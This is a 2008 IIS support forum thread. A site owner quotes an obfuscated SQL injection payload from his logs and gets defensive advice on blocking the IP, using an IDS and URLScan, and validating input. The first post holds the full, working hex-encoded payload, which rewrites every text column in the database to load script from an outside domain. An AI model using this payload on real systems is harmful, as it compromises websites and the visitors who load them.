Thread: Injection attack attempt

Last post 08-17-2008 10:01 PM by steve schofield. 1 replies.

Average Rating Rate It (5)Thank you for the rating!

RSS

Page 1 of 1 (2 items)

Sort Posts:

08-15-2008, 9:40 PM

erikkl2000
Joined on 06-05-2005, 5:55 AM
McKinney, TX.
Posts 29

Injection attack attempt

Reply Contact

Hi,

I have someone from china trying to wipe me out and before I go poking around in iis and blocking someone out that is not trying to harm my database can someone tell me the correct steps to take. " SHORT VERISON " ;)

How much of this ip should i block and how.

123.54.133.21

DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S);

I have IIS 7.0

Thanks a lot !

Erik

There’s my side and there’s your opinion

08-17-2008, 10:01 PM In reply to

steve schofield
Joined on 06-10-2002, 4:54 PM
MI
Posts 2,581

Re: Injection attack attempt

Reply Contact

1) block the IP attempting this

2) Have some type of IDS (intrusion detection system) to monitor and automatically block 'bot' type attacks. If possible

3) Look at deploying urlscan 3.0 to help deny these attacks. The real way to prevent being zapped is trust no user data input and validate everything.

Steve Schofield
Windows Server MVP - IIS
http://weblogs.asp.net/steveschofield

http://www.IISLogs.com
Log archival solution
Install, Configure, Forget

Page 1 of 1 (2 items)